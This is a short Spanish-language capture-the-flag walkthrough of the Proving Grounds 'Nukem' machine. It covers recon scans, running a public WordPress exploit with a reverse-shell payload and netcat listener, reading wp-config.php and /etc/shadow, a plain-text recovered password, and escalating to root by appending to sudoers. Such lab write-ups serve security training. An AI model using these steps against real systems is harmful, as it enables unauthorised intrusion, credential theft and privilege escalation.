Nukem

Nukem


ProvingGrounds Windows

nmap -A -p- -oA nukem 192.168.235.105 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA nukem 192.168.235.105

nmap -sU -O -p- -oA nukem-udp 192.168.235.105

nikto -h 192.168.235.97:8091

ssh_command.

ssh_command.

whatweb http://192.168.235.105:80

ssh_command.

Vamos a http://192.168.235.105

ssh_command.

wpscan —url http://192.168.235.105

ssh_command.

searchsploit -m 48979

ssh_command.

python 48979.py http://192.168.235.105

Cambiamos el payload para que haga un reverse shell a nuestra computadora.

nc -lvnp 4444

ssh_command.

cat /srv/http/wp-config.php

credenciales

commander:CommanderKeenVorticons1990

ssh_command.

ssh -L 5901:localhost:5901 commander@192.168.235.105

vncviewer localhost:5901

Introducimos las contrasena CommanderKeenVorticons1990

ssh_command.

Abrimos dsbox y hacemos lo siguiente:

mount C /etc

C:

type shadow

ssh_command.

echo commander ALL=(ALL) ALL >> sudoers

ssh_command.

sudo -i

ssh_command.

© 2025 Cu3rv0x